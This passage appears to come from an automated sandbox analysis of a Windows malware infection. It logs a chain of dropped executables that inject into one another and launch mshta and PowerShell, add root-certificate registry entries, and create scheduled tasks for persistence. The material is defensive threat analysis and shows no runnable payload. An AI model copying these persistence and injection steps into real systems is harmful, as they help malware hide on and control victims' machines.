Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe N/A
N/A N/A C:\ProgramData\wwasfxe\orhct.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempFH0QKNVVU00PUNBK14MOJOZPXKNX5XMK.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10016760101\files.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10016760101\files.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10016760101\files.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10016760101\files.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1964 wrote to memory of 1028 N/A C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 1964 wrote to memory of 1028 N/A C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 1964 wrote to memory of 1028 N/A C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 1964 wrote to memory of 1028 N/A C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 1028 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe
PID 1028 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe
PID 1028 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe
PID 1028 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe
PID 2748 wrote to memory of 1180 N/A C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe C:\Windows\Explorer.EXE
PID 1028 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe
PID 1028 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe
PID 1028 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe
PID 1028 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe
PID 1028 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe
PID 1028 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe
PID 1028 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe
PID 1028 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe
PID 3024 wrote to memory of 1012 N/A C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 3024 wrote to memory of 1012 N/A C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 3024 wrote to memory of 1012 N/A C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 3024 wrote to memory of 1012 N/A C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 1012 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe
PID 1012 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe
PID 1012 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe
PID 1012 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe
PID 1028 wrote to memory of 872 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe
PID 1028 wrote to memory of 872 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe
PID 1028 wrote to memory of 872 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe
PID 1028 wrote to memory of 872 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe
PID 1028 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe
PID 1028 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe
PID 1028 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe
PID 1028 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe
PID 1908 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
PID 1908 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
PID 1908 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
PID 1908 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
PID 1956 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe C:\Windows\SysWOW64\WerFault.exe
PID 1956 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe C:\Windows\SysWOW64\WerFault.exe
PID 1956 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe C:\Windows\SysWOW64\WerFault.exe
PID 1956 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe C:\Windows\SysWOW64\WerFault.exe
PID 1028 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10097710101\faeba77a20.exe
PID 1028 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10097710101\faeba77a20.exe
PID 1028 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10097710101\faeba77a20.exe
PID 1028 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10097710101\faeba77a20.exe
PID 2536 wrote to memory of 672 N/A C:\Users\Admin\AppData\Local\Temp\10097710101\faeba77a20.exe C:\Windows\SysWOW64\cmd.exe
PID 2536 wrote to memory of 672 N/A C:\Users\Admin\AppData\Local\Temp\10097710101\faeba77a20.exe C:\Windows\SysWOW64\cmd.exe
PID 2536 wrote to memory of 672 N/A C:\Users\Admin\AppData\Local\Temp\10097710101\faeba77a20.exe C:\Windows\SysWOW64\cmd.exe
PID 2536 wrote to memory of 672 N/A C:\Users\Admin\AppData\Local\Temp\10097710101\faeba77a20.exe C:\Windows\SysWOW64\cmd.exe
PID 2536 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\10097710101\faeba77a20.exe C:\Windows\SysWOW64\mshta.exe
PID 2536 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\10097710101\faeba77a20.exe C:\Windows\SysWOW64\mshta.exe
PID 2536 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\10097710101\faeba77a20.exe C:\Windows\SysWOW64\mshta.exe
PID 2536 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\10097710101\faeba77a20.exe C:\Windows\SysWOW64\mshta.exe
PID 672 wrote to memory of 1944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 672 wrote to memory of 1944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 672 wrote to memory of 1944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 672 wrote to memory of 1944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 916 wrote to memory of 1968 N/A C:\Windows\system32\taskeng.exe C:\ProgramData\wwasfxe\orhct.exe
PID 916 wrote to memory of 1968 N/A C:\Windows\system32\taskeng.exe C:\ProgramData\wwasfxe\orhct.exe
PID 916 wrote to memory of 1968 N/A C:\Windows\system32\taskeng.exe C:\ProgramData\wwasfxe\orhct.exe
PID 916 wrote to memory of 1968 N/A C:\Windows\system32\taskeng.exe C:\ProgramData\wwasfxe\orhct.exe
PID 2344 wrote to memory of 396 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2344 wrote to memory of 396 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2344 wrote to memory of 396 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

